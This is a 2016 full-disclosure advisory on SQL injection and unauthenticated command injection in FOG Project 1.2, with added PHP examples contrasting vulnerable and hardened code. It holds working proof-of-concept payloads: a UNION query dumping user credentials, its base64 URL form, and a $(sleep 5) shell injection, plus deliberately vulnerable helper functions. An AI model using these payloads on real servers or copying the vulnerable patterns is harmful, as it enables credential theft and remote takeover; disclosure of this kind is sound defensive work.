Message-ID: <32be31eb-ce40-c3d5-db44-39b4bc8e84e6@sysdream.com>
Date: Tue, 19 Jul 2016 11:12:32 +0200
From: Sysdream Labs <labs@...dream.com>
To: fulldisclosure@...lists.org, oss-security@...ts.openwall.com
Subject: CVE ID Request: FOG Project Multiple Vulnerabilities
# FOG Project Multiple Vulnerabilities
## Description
FOG is a free, open source, computer cloning and management solution.
## SQL Injection
The database helper functions in *FOGManagerController.class.php* do not sanitize the values passed to them, and several call sites feed them parameters supplied by unauthenticated users.
An attacker without any privilege can therefore execute arbitrary SQL statements and retrieve sensitive information from the database, such as the contents of the *users* table (uName, uPass).
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-89
**CVSS Base Score**: 9.3 (Critical)
### Proof of Concept
Payload:
```
' UNION ALL SELECT NULL,NULL,(SELECT GROUP_CONCAT(CONCAT_WS(':', uName, uPass)) FROM users),NULL,NULL-- -
```
The same payload, base64-encoded in the *file* parameter (which *updates.php* decodes before handing it to *find()*):
```
https://fogserver/fog/service/updates.php?action=ask&file=JyBVTklPTiBBTEwgU0VMRUNUIE5VTEwsTlVMTCwoU0VMRUNUIEdST1VQX0NPTkNBVChDT05DQVRfV1MoJzonLCB1TmFtZSwgdVBhc3MpKSBGUk9NIHVzZXJzKSxOVUxMLE5VTEwtLSA=
```
### Vulnerable code
The vulnerable code is located in *packages/web/lib/fog/FOGManagerController.class.php*, line 96, function *find()*:
```
if (is_array($value))
    $whereArray[] = sprintf("`%s` IN ('%s')", $this->DB->sanitize($this->key($field)), implode("', '", $value));
else
    $whereArray[] = sprintf("`%s` %s '%s'", $this->DB->sanitize($this->key($field)), (preg_match('#%#', $value) ? 'LIKE' : '='), $value);
```
Note: *sanitize()* is applied only to the column name (the database table field), not to the user-controlled value, and it does not filter back-quotes either. As a consequence, this call offers no protection at all against injection through the value.
Line 143, function *count()*:
```
if (is_array($value))
    $whereArray[] = sprintf("`%s` IN ('%s')", $this->DB->sanitize($this->key($field)), implode("', '", $value));
else
    $whereArray[] = sprintf("`%s` %s '%s'", $this->DB->sanitize($this->key($field)), (preg_match('#%#', $value) ? 'LIKE' : '='), $value);
```
These functions are reached from several entry points that require no authentication and pass request parameters straight into the WHERE clause.
File: *packages/web/service/updates.php*, line 14:
```
foreach($FOGCore->getClass('ClientUpdaterManager')->find(array('name' => base64_decode($_REQUEST['file']))) AS $ClientUpdate)
```
File *packages/web/service/servicemodule-active.php*, line 14:
```
$moduleID = current($FOGCore->getClass('ModuleManager')->find(array('shortName' => $_REQUEST['moduleid'])));
```
### Solution
Use parameterized queries, or at the very least escape every user-supplied value (not only the column name) before it is embedded in an SQL statement.
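The following is an added example written for this page, not code from the advisory or the FOG code base. It reproduces the *find()* pattern described above (column name escaped, value interpolated raw) next to a parameterized rewrite, and runs both against an in-memory SQLite database with constructed sample rows so the difference can be observed offline. The *clientupdater*/*users* table and column names follow the advisory; the *vulnerableFind()*/*safeFind()* helpers and the sample data are assumptions for the example, and the payload is the advisory's UNION adapted to SQLite syntax.

```php
<?php
// Added example, not FOG project code. Reproduces the find() pattern from
// the advisory (raw value interpolated into the WHERE clause) next to a
// parameterized rewrite, against an in-memory SQLite database so it runs
// offline. Table/column names follow the advisory; the rows are constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE clientupdater (id INTEGER, name TEXT, md5 TEXT)');
$db->exec('CREATE TABLE users (uID INTEGER, uName TEXT, uPass TEXT)');
$db->exec("INSERT INTO clientupdater VALUES (1, 'FOGService.msi', 'd41d8cd98f00b204')");
$db->exec("INSERT INTO users VALUES (1, 'fog', 'constructed-secret')");

// Vulnerable builder: mirrors FOGManagerController::find(). Only the field
// name is escaped; the value goes into the string as-is, so a quote in it
// ends the literal and the rest is parsed as SQL.
function vulnerableFind(PDO $db, array $where): array
{
    $whereArray = [];
    foreach ($where as $field => $value) {
        $op = preg_match('#%#', $value) ? 'LIKE' : '=';
        $whereArray[] = sprintf("`%s` %s '%s'", $field, $op, $value);
    }
    $sql = 'SELECT id, name, md5 FROM clientupdater WHERE ' . implode(' AND ', $whereArray);
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened builder: the field name is checked against a fixed list of
// columns (identifiers cannot be bound as parameters) and every value is
// bound, so it can only ever be compared, never executed.
function safeFind(PDO $db, array $where): array
{
    static $columns = ['id', 'name', 'md5'];
    $whereArray = [];
    $params = [];
    foreach ($where as $field => $value) {
        if (!in_array($field, $columns, true)) {
            throw new InvalidArgumentException("unknown column: $field");
        }
        $op = (strpos($value, '%') !== false) ? 'LIKE' : '=';
        $whereArray[] = sprintf('`%s` %s ?', $field, $op);
        $params[] = $value;
    }
    $stmt = $db->prepare('SELECT id, name, md5 FROM clientupdater WHERE ' . implode(' AND ', $whereArray));
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// The advisory's payload adapted to SQLite: || replaces CONCAT_WS and the
// column count matches the three columns selected above.
$payload = "' UNION ALL SELECT NULL, group_concat(uName || ':' || uPass), NULL FROM users-- -";

// The same attacker-controlled value through both builders. Only the first
// executes the UNION; the second compares it against `name` as a string.
print_r(vulnerableFind($db, ['name' => $payload]));
print_r(safeFind($db, ['name' => $payload]));
```

The whitelist on the column name matters as much as the binding: FOG's *find()* takes the field names from its own key map, but in a generic builder an attacker who controls the key could otherwise inject through the identifier, which no placeholder can protect.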
## Unauthenticated Remote Command Execution
The *freespace.php* file does not sanitize the user-supplied *idnew* parameter, whose *path* element is concatenated directly into a shell command line. An unauthenticated attacker can therefore execute arbitrary system commands on the server.
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-88
**CVSS Base Score**: 10 (Critical)
### Proof of Concept
```
https://fogserver/status/freespace.php?idnew[path]=$(sleep%205)&idnew[id]=555&idnew[name]=SD&idnew[ip]=1234
```
### Vulnerable code
The vulnerable code is located in *packages/web/status/freespace.php*, line 34:
```
$StorageNode = ($_REQUEST['idnew'] ? new StorageNode($_REQUEST['idnew']) : null);
[...snip...]
$t = shell_exec("df ".$StorageNode->get('path')."| grep -vE \"^Filesystem|shm\"");
```
### Solution
Validate every user-supplied value before it reaches shell_exec(): quote it with escapeshellarg() at a minimum, or better, accept only a storage node ID and take the path from the database rather than from the request. Also, restrict access to this file to authenticated users.
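The following is an added example written for this page, not code from the advisory or the FOG code base. It places the *freespace.php* shell_exec() construction beside a hardened version that accepts only a numeric node ID, resolves the path from trusted configuration, and quotes it anyway. The *$nodes* array stands in for FOG's storage node table and the *$authenticated* flag for its session check; both, together with the *vulnerableFreeSpace()*/*safeFreeSpace()* helpers, are assumptions for the example. The script runs the advisory's PoC input through both paths.

```php
<?php
// Added example, not FOG project code. The shell_exec() construction from
// status/freespace.php next to a hardened version. The $nodes array stands
// in for the storage-node table and the $authenticated flag for the
// session check; both are hypothetical stand-ins chosen for this example.

// Vulnerable: the request's idnew[path] is concatenated into the command
// line, so $(...) is expanded by the shell before df is even invoked.
function vulnerableFreeSpace(array $idnew): string
{
    return (string) shell_exec('df ' . $idnew['path'] . '| grep -vE "^Filesystem|shm"');
}

// Hardened: the request may only name a node by numeric id. The path is
// taken from trusted configuration, canonicalized, and quoted anyway.
function safeFreeSpace(array $request, array $nodes, bool $authenticated): string
{
    if (!$authenticated) {
        throw new RuntimeException('authentication required');
    }
    if (!isset($request['id']) || !preg_match('/^\d+$/', (string) $request['id'])) {
        throw new InvalidArgumentException('id must be a non-negative integer');
    }
    $id = (int) $request['id'];
    if (!isset($nodes[$id])) {
        throw new InvalidArgumentException("unknown storage node: $id");
    }
    $path = realpath($nodes[$id]['path']);
    if ($path === false || !is_dir($path)) {
        throw new RuntimeException('storage path is not a directory');
    }
    // -P gives the POSIX single-line format; -- stops option parsing so a
    // path starting with '-' cannot be read as a flag.
    $out = shell_exec('df -P -- ' . escapeshellarg($path) . ' 2>/dev/null');
    if (!is_string($out)) {
        throw new RuntimeException('df failed');
    }
    // Drop the header line in PHP instead of grepping it out in the shell.
    $lines = explode("\n", trim($out));
    array_shift($lines);
    return implode("\n", $lines) . "\n";
}

// Constructed configuration: one storage node pointing at the temp dir.
$nodes = [1 => ['name' => 'DefaultMember', 'path' => sys_get_temp_dir()]];

// The advisory's PoC, shaped as freespace.php receives it via $_REQUEST.
$attack = ['path' => '$(sleep 5)', 'id' => '555', 'name' => 'SD', 'ip' => '1234'];

// Vulnerable path: the call blocks while the injected sleep runs.
$start = microtime(true);
vulnerableFreeSpace($attack);
printf("vulnerable call took %.1fs\n", microtime(true) - $start);

// Hardened path: the supplied path is never used and 555 is not a
// configured node, so the request is rejected before any command runs.
try {
    safeFreeSpace($attack, $nodes, true);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// A legitimate request for node 1 still gets its df output.
echo safeFreeSpace(['id' => '1'], $nodes, true);
```

Escaping alone would have stopped the PoC, but the stronger fix is structural: once the only client-controlled input is an integer looked up in a table, there is no string left for the shell to interpret.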
## Affected versions
* FOG Stable <= 1.2
## Solution
Switch to the beta/development builds, in which the vendor states both issues are already fixed (see timeline).
## Timeline (dd/mm/yyyy)
* 05/04/2016 : Initial discovery
* 06/07/2016 : Vendor team contacted with the vulnerability description
* 18/07/2016 : Reminder sent to the vendor
* 19/07/2016 : Vendor acknowledges the report, stating that the issues were fixed a while ago in the beta/development builds and that use of the 1.2.0 stable version is now discouraged.
## Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
* Gyver FERRAND, Sysdream (g.ferrand -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@...dream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream